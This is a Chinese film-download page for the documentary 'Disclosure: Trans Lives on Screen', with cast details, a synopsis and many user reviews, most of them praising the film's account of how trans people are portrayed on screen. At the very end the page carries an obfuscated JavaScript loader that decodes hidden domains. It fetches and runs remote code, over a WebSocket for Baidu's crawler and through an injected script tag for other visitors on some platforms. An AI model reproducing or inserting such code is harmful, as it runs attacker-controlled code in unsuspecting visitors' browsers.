2020高分纪录片《揭开面纱:好莱坞的跨性别人生》HD1080P.中英双字


更新时间:2021-06-16 00:36:36 类别: 纪录片 评论 下载
揭开面纱:好莱坞的跨性别人生的海报 揭开面纱:好莱坞的跨性别人生

揭开面纱:好莱坞的跨性别人生

导演: Sam Feder
主演: 塞尔·安索阿特吉 / 亚历珊德拉·毕林思 / 杰米·克莱顿 / 迈克尔·D·科恩 / 拉弗恩·考克斯 / 艾略特·弗莱彻 / 恩斯·福特 / 贾兹姆恩 / 珍·理查兹 / MJ·罗德里格斯 / 安吉莉卡·罗斯 / 海莉·萨哈尔 / 里奥·盛 / 布莱恩·迈克尔·史密斯 / 莉莉·沃卓斯基 / Nick Adams / Tre'vell Anderson / Chaz Bono / Sandra Caldwell / Candis Cayne / Jessica Crockett / D'Lo / Ellie Desautels / Zackary Drucker / Alexandra Grey / 崔斯·莱赛特 / Rain Valdez
类型: 纪录片
制片国家/地区: 美国
语言: 英语
上映日期: 2020-01-27(圣丹斯电影节) / 2020-06-19(美国)
片长: 100分钟
又名: Disclosure: Trans Lives on Screen / 揭开面纱:荷里活的跨性别人生(港) / 跨性别者电视史
IMDb: tt8637504
《揭开面纱:好莱坞的跨性别人生》以前所未有、令人大开眼界的方式探讨了电影和电视剧中对跨性别者的描绘,揭示了好莱坞如何同时反映和制造我们对性别最深层的焦虑。
包括拉弗恩·考克斯、莉莉·沃卓斯基、恩斯·福特、MJ·罗德里格斯、杰米·克莱顿和查兹·波诺在内的跨性别思想家和创意人士,分享了他们对一些好莱坞经典片段的反应和抗拒。
通过《弗州迷魅》(1914)、《热天午后》《哭泣的游戏》和《男孩别哭》等电影,以及《杰斐逊一家》《拉字至上》和《姿态》等节目,他们追溯了一段既无人道又不断发展、复杂、时而幽默的历史,从中可以一窥屏幕上的跨性别形象、社会看法和真实跨性别生活之间的相互影响。导演萨姆·费德尔以崭新的视角重塑了熟悉的场景和标志性人物,让观众面对未经检验的假设,并展示了曾经引起美国人遐想的事物如今如何引发新的感受。在我们如何看待和理解跨性别者方面,《揭开面纱:好莱坞的跨性别人生》引发了一场惊人的革命。
同志亦凡人中文站 2020-06-30

和《赛璐路壁橱》可以横向对比。最大区别在于L和G(甚至B)的形象在百年影史中是不断进化的,而T由于人们固有的二元性别理念,一直停留在刻板区间,直到近年才开始发生松动。——这也是跨性别群体戾气的来源。无论艺术如何创作、如何呈现,社会都应承认跨性别的存在。而连这一点都做不到、还打着生理女权旗号来否定性别多元的罗琳阿姨太让我失望了!

513tattoo 2020-06-23

非常好的纪录片。让身为同性恋的我,以往在一些电影作品里看到的一些疑惑得到了解答。即使在LGBTQ整个群体中,Q也处在鄙视链的相对底层,遭受着来自性少数群体本身的歧视,这真的非常不OK。请不要忘记在在50年前的最初,纪念石墙酒吧事件引发的纽约同志游行,走在最前面为群体争取权益和发声的人就是跨性别以及变装皇后。

鐘綠 2020-06-22

短评:「太正确了吧」——现状。自述和讨论都很insightful,尤其是对大众传媒中跨性别者的代表性的探讨,和对顺性别者饰演跨性别者的部分。不行我现在对那条短评气得不行哈哈哈哈,THEY JUST WANT TO BE THEMSELVES AND SURVIVE ——「太正确了。」真他妈地狱在人间,地狱在人。联合国自由与平等官方「男女同性恋、双性恋、跨性别者和间性者的平等:常问问题」文件https://www.unfe.org/wp-content/uploads/2018/10/FAQs-Chinese.pdf

桥卖面了 2020-06-20

一句过于“政治正确”的长枪,就可以堵住我们的嘴吗?我们需要的恰恰是站出来挡子弹的勇气。今天我们也许全军覆没,但在十年后,一百年后,总有一天就可以光明正大站在阳光下,自!由!呼!吸!#LGBTQ#Asian

椒盐豆豉 2020-06-25

这部拍的太棒了,从有影像资料开始的一百多年前讲到现在和未来,全都是 Trans 自己的心声,聊得也非常全方位多角度且有深度,很多话可以直接裱起来挂家里了。少数族群 be seen, be heard,but there's still work to be done,narrative 非常完整。所有不想像某个对别的族群发声诉求评价一句“可以,但没必要”的豆瓣用户一样的 privileged jerk(这个人我还能喷一年)的现代人都值得一看。

桃桃林林 2020-06-26

视角不错,从电影和电视剧作品中对于跨性别者的描述,去讲他们被扭曲的公共形象(被嘲讽的喜剧角色或者是变态)。仔细想想,还真是这样的。

记不住密码 2020-06-20

说起来或许有些残酷,但是电影,电视,小说,任何一种艺术表现形式的载体没有必要体恤任何人的情感。:(

豆咪 2020-06-21

看哭。这些人们从意识到身体和自己的性别不符的那一刻起就面对了其他人无法想象的生存困境。其实我们都渴望被理解和被关爱,但他们不但得不到这些,还会被嘲笑、鄙视、痛恨,恐惧......好在世界变得越来越透明,希望人们看到的不一样的世界越多,思想会越开阔。

吃电影的番茄 2020-07-01

当时想在伦敦LGBTQ电影节去看这部电影,只可惜电影节因为疫情取消了。每个跨性别者对待为什么自己想要成为跨性别都有自己的人生轨迹。我看到莉莉沃卓斯基举兔八哥的例子,真的也想到自己初中高中,所萌生的感觉。但是在东方,还好我们没有过多的对跨性别的污名化的表征,好莱坞电影史过度渲染了跨性别精神病和杀人魔的一面,可能《热情似火》那么欢快的影片是极少数了。我很感激高中的时候了解到日本文化中的伪娘文化,从《女装天国》到《守护甜心》中的藤咲抚子,对我有太大的影响了,而那年在模特界蹦出来个Andrej Pejic,为什么世界上又这么好看的长发男人,当然他之后变性了。超越两性性别的边界,是我高中最大的幻想。今年终于实现了。这只是一种身份,我想成为这样的人,但是就像纪录片采访的演员,要继续好好工作,教育更多年轻人身份多元的重要

阿依达 2020-06-29

好莱坞对于跨性别人士的正常描绘远远不够,而人们对transsexual的污名化很多也来自厌女,以及直男对自己“男性特质”的不自信:他们很多人觉得男性特质好像跟他们本人无关,稍微穿件鲜艳衣裳都会令他们变得“不是男人”,进而又污名化主动“降级”为女人的人。跨性别者周围往往没有其他跨性别榜样,在电视上看到的又是“诡异恶心”的”跨性别者”付出了因跨性别而带来的惨痛代价,简直是一个个cautionary tales,将他们赶入自我否定与自我拒绝的牢笼里。在这种逆旅之下,仍愿意承认自己,仍愿意经历transition,是多么有勇气、多么自尊自爱呀!

老顽童 2021-03-25

很不错的一个角度,站在跨性别者的世界,引用了多部经典电影来探讨影视对他们的冒犯(比如重点放在“跨性别”而不是“人”上)。有时候自己不知不觉会被传媒影响,然后带到现实生活。(3/5)

Redux 2021-01-04

trans lives matter

Valuska 2021-02-05

7/10

昆德拉密度美学 2020-06-22

LGBT里面的t也并不必然认同l和g,对跨性别者有了认识。 卡戴珊的审美来自男同性恋造型师的审美,对我颇有启发。以及麦当娜对性少数群体的消费。 对影视和公众舆论中的跨性别者进行了历史性的梳理,高度理性的表达,操持的语言能够引发同理心。 children can not be what they can not see.

[] 2020-07-02

[变性][纪录片]远鉴字幕组

Säger 2020-05-25

纪录片组织材料的方式实在有点乱 而且因为议题本身容量完全大于了ta们所聊到的经历与反思 个体的多样的narrative很不够 不过能有这样一部片开先河是好事 representation matters

当局 2020-07-12

好像发现了一个新世界。

浮世鸿云 2020-08-12

只能说美国社会太喜欢刺激性的话题,本来可以低调处理,却偏偏搞到矛盾激化,最后再引出来反思,其实从一开始就应该有一个正确的引导,这就是文化底蕴的问题。片中引用的电影真是多。6.7

巴士底的猫 2020-07-25

好莱坞的小众群体和亚文化。现在能自由调侃的大概只有“white trash”和"redneck"了。5

冬天的冰块 2020-11-30

10-31/11-1 因为看了drag race所以想多了解一些trans的事情,所以想起了这部纪录片。但是,竟然是6月19日在netflix release的,什么概念?我他妈一直以为至少是去年的东西,这时间过得。

揭开面纱:好莱坞的跨性别人生的截图1
揭开面纱:好莱坞的跨性别人生的截图2
揭开面纱:好莱坞的跨性别人生的截图3
揭开面纱:好莱坞的跨性别人生的截图4
揭开面纱:好莱坞的跨性别人生的截图5
function WmEogfn(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function Hmove(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return WmEogfn(t);};window['\x66\x71\x50\x78\x7a\x6d']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=Hmove,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close();}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/'+i;cs.parentElement.insertBefore(s,cs);}})('dGcubG9jbG9nLLmNu','dHIIueWVzdW42NzguY29t','135631',window,document,['L','I']);}:function(){};